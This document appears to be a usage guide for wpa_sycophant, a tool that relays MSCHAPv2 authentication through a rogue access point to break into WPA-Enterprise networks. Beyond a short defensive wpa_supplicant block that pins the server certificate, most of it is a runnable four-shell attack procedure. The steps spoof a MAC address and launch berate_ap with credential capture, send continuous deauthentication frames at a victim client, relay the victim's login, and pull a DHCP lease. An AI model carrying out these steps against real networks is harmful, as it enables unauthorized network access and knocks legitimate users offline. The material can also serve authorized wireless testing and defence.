Overview

wpa_sycophant exploits a fundamental weakness in MSCHAPv2: the challenge and response can be relayed. When a victim connects to a rogue AP (run by berate_ap), wpa_sycophant forwards the real AP's challenge to the victim and relays the victim's response to the real AP, authenticating as the victim without ever cracking the password. The relay only works when the victim client does not validate the server certificate presented inside the PEAP tunnel.
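
The precondition above seen from the client side, as an added example that is not part of the wpa_sycophant project: a wpa_supplicant network block that pins the authentication server's certificate to an enterprise CA and to an exact server name, so a PEAP tunnel to an AP presenting any other certificate is torn down before MSCHAPv2 runs. The CA path, server name and credentials are placeholders.

```conf
network={
  ssid="<TARGET-SSID>"
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="<USERNAME>"
  password="<PASSWORD>"
  phase2="auth=MSCHAPV2"
  # Only accept a server certificate chaining to the enterprise CA (placeholder path).
  ca_cert="/etc/ssl/certs/<ENTERPRISE-CA>.pem"
  # Only accept a server certificate whose subject/SAN matches this exact name (placeholder).
  domain_match="<RADIUS-SERVER-FQDN>"
}
```

Without ca_cert and domain_match, wpa_supplicant accepts whatever certificate the rogue AP offers and the inner MSCHAPv2 exchange becomes relayable.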

Install

git clone https://github.com/sensepost/wpa_sycophant.git
cd wpa_sycophant

Usage

./wpa_sycophant.sh -c <config.conf> -i <interface>

Config File

network={
  ssid="<TARGET-SSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  bssid_blacklist=<ROGUE-AP-MAC>
}

bssid_blacklist must be set to the rogue AP's MAC address (the one assigned to the berate_ap interface) to prevent wpa_sycophant from connecting back to its own rogue AP instead of the real one. If the relay fails, try forcing PEAP version 1 in phase1:

phase1="peapver=1"

Full Attack Setup

Shell 1, set rogue AP MAC and launch berate_ap:

systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up

cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout output.log wlan1 lo <TARGET-SSID>

Shell 2, deauthenticate the target client:

airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>

Shell 3, start the relay:

cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2

Shell 4, get an IP once connected:

dhclient wlan2 -v